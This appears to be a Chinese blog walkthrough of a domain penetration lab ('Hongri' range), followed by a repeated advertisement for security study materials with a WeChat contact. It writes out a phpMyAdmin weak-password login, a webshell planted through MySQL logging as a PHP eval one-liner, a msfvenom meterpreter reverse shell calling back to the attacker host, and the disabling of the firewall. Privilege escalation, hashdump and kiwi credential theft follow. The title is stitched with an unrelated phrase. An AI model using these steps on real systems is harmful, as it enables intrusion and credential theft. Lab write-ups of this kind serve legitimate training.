内网域渗透总结——红日靶场①_红日靶机账号密码，2024年最新Flutter尽然还能有这种操作

192.168.43.33
win7----admin@123
外网：192.168.43.17
内网：192.168.52.143
可以Ping通外网
通192.168.52.138（win2008）
通192.168.52.141（win2003）
小皮必须是自带的，下载的新版本会导致kali机连接目标失败
问题原理：自行理解
win2008—admin@123
192.168.52.138
win2003—admin@123
192.168.52.141
内网两台不出网win互通
win7开启phpstudy
win11访问80端口得到phpstudy探针

​![](https://img-blog.csdnimg.cn/cb83b4d2f1144d39a20193fd6bc35904.png)![](https://img-blog.csdnimg.cn/693a3c27d878480580e9fa0e29ca5349.png)![](https://img-blog.csdnimg.cn/eade48320abb42a6a322d29d09e8c83a.png)


### 二、外网渗透


#### 信息收集


#### 端口扫描

nmap -A -p -min-rate 10000 192.168.43.17
#发现开启了80，3306端口
#访问发现80端口是php探针
#得到了探针的绝对路径 C：/phpst2016/WWW/l.php

​![](https://img-blog.csdnimg.cn/1ca5b3bacb90414e83415e7c8b3290a9.png)


 ![](https://img-blog.csdnimg.cn/b9ebe6d71e314a0eb5a1b6e083e61078.png)


#### 目录爆破

dirsearch -u http://192.168.43.17
#出了一些有用信息
#phpMyadmin，phpinfo.php，l.php，

​![](https://img-blog.csdnimg.cn/6fe384630b704876bdc66baa49c53406.png)


#### 访问phpMyadmin

#发现是一个后台界面
#直接弱口令登录成功
root root

​![](https://img-blog.csdnimg.cn/fc630dbe6bf5465489ca280c4c736487.png)


​


#### 弱口令登录成功


​![](https://img-blog.csdnimg.cn/81ab147e604f48c58ccbec064982574b.png)


#### 拿到webshell

#通过日志文件写入一句话来获取webshell：
#写入webshell-网站根目录下shell,把日志log改为php
SET global general_log = ‘ON’
SET global general_log_file= ‘C:/phpst2016/WWW/shell.php’
select “<?php eval($_POST['111']);?>”

​![](https://img-blog.csdnimg.cn/0b045118cb6e4f93ae020af966e058b8.png)![](https://img-blog.csdnimg.cn/3ae6cb1302b04c57a1b7e69671f62736.png)


​​​![](https://img-blog.csdnimg.cn/9e671550bc1f4f75ab672ada83c68838.png)


![](https://img-blog.csdnimg.cn/538e6cbc386143dd876cb6cf9bfa4442.png)


#### 蚁剑连接shell.php

#打开蚁剑
#新建连接
#输入URL：http://192.168.43.17/shell.php
#输入密码：111

​![](https://img-blog.csdnimg.cn/f6cfab74837a4189b051ef5feb7cd960.png)


#### 信息收集

#发现目标存在yxcms，尝试访问
#在首页发现了后台地址和管理员账密

​![](https://img-blog.csdnimg.cn/9bbaf18025164515b6f30196a53a50d8.png)


#### 进入yxcms后台

#网址输入：http://192.168.43.17/yxcms/index.php?r=admin
#admin
#123456

​![](https://img-blog.csdnimg.cn/4418f2e27bac461886a925b1378c3a99.png)


#### 利用文件上传


​![](https://img-blog.csdnimg.cn/1a199cfd021f4a53b2251e0f1bc96dac.png)


#### 蚁剑连接

#小提一下，马子上传了，不知道马子绝对路径怎么办？
#前面我们不是发现phpstudy文件夹下存在beifen.rar
#猜测应该是yxcms的备份文件
#解压之后，可通过查找acomment.php文件来确定文件上传的路径
#/yxcms/protected/apps/default/view/default

​​![](https://img-blog.csdnimg.cn/0afda1e05b99436fadcbc4599ed3017b.png)


  
 ​

#URl:http://192.168.43.17/yxcms/protected/apps/default/view/default/cmsshell.php

​![](https://img-blog.csdnimg.cn/7e2925bdf5134c08b430b09c4ee41724.png)

至此，已经拿到Webshell

### 三、后渗透


后渗透阶段，当我们已经将小马上传到web服务器上时，可以用webshell管理工具进行下一步渗透了。


#### 蚁剑终端关闭win7防火墙

#关闭win防火墙
netsh advfirewall set allprofiles state off
#查看防火墙配置状态
netsh advfirewall show allprofile state

​![](https://img-blog.csdnimg.cn/686d215a57c84258ba8faab437be21e7.png)


 ![](https://img-blog.csdnimg.cn/bdc81ab7cab141dab1d8c12dd600e062.png)


#### msf生成exe并开启监听

#kali创建后门程序
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.43.33 LPORT=10888 -f exe -o 233.exe

#蚁剑上传233.exe
#蚁剑终端运行233.exe

#kali开启监听，设置sessions
use exp/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.43.33
set lport 10888
run

​​![](https://img-blog.csdnimg.cn/f7e43b3eab9b44fd835320bf807c0ec4.png)


 ![](https://img-blog.csdnimg.cn/03d1558aa7d34bbab44ff4f7876536e8.png)


#### 拿到win7shell

#尝试提权
#因为是administrator用户，
#所以很容易提权成功。
shell
getuid
getsystem
getuid

​![](https://img-blog.csdnimg.cn/1150e6fa2e794f0281bed123f739ddc6.png)


#### 利用msf进行内网信息收集

chcp 65001 —可解决乱码问题
route print —锁定内网C段
net time /domain —锁定域控192.168.52.138
net user /domain —锁定域内五个账户
ipconfig /all —锁定域名
net view —锁定域内主机
net group “domain admins” /domain —查询域管理员

---

域名：god.org
域内五个用户：Administrator、Guest、liukaifeng01、ligang、krbtgt
域内三台主机：OWA（win2k8）、ROOT-TVI862UBEH(192.168.52.141)、STU1(win7)
域控：OWA(192.168.52.138)
win7内网ip：192.168.52.143

​![](https://img-blog.csdnimg.cn/ce4b29d1b47b45bf8385d7a239bb066e.png)


​![](https://img-blog.csdnimg.cn/38ab320f01d140718403c46fa4594be0.png)


​![](https://img-blog.csdnimg.cn/d4600bb2030b441fba1321f51e2ef6be.png)


#### hashdump

hashdump —导出本地用户账号密码，该命令的使用需要系统权限。

​![](https://img-blog.csdnimg.cn/46e91bc3031b4ca6b973dcba37e65b51.png)

#CMD5解密
—#hash解密为空：
—#因为当系统为win10或2012R2以上时，
—#默认在内存缓存中禁止保存明文密码，密码字段显示为null，
—#需要修改注册表等用户重新登录后才能成功抓取。

​![](https://img-blog.csdnimg.cn/86d90944e92b479e90dff9f183d47752.png)


#### 抓取域内账密

#利用msf的kiwi模块+system权限
load kiwi #加载kiwi模块
help kiwi #查看kiwi模块的使用
creds_all #列举所有凭据
creds_kerberos #列举域内账密 Administrator admin@123

​![](https://img-blog.csdnimg.cn/864d559621cc40c8adc69b17acbd5b06.png)


​![](https://img-blog.csdnimg.cn/1716783b7d5f454d940acedd0bce599c.png)


**自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。**

**深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！**

**因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/eeddd5919fda739b817cd344820a0d02.png)
![img](https://img-blog.csdnimg.cn/img_convert/d6aedb550bbc44b151c208c155d247fc.png)
![img](https://img-blog.csdnimg.cn/img_convert/7ed5ff0b5ec790e144111c88fb0bb45f.png)
![img](https://img-blog.csdnimg.cn/img_convert/969928a1923f988a71a22510f2e2bcc3.png)
![img](https://img-blog.csdnimg.cn/img_convert/5b7022bb57d91a792462bdd7166a0970.png)
![img](https://img-blog.csdnimg.cn/img_convert/b1b36d035d99a4963abd33d28b236160.png)

**既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！**

**由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新**

**如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）**
![img](https://img-blog.csdnimg.cn/img_convert/17b6ea7c7503fd54b7b031874802d524.png)

-ID99qtQx-1713052380879)]
[外链图片转存中...(img-XcDrUhoJ-1713052380880)]
[外链图片转存中...(img-5N56Wv1H-1713052380880)]

**既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！**

**由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新**

**如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）**
[外链图片转存中...(img-SAP5qLJ7-1713052380880)]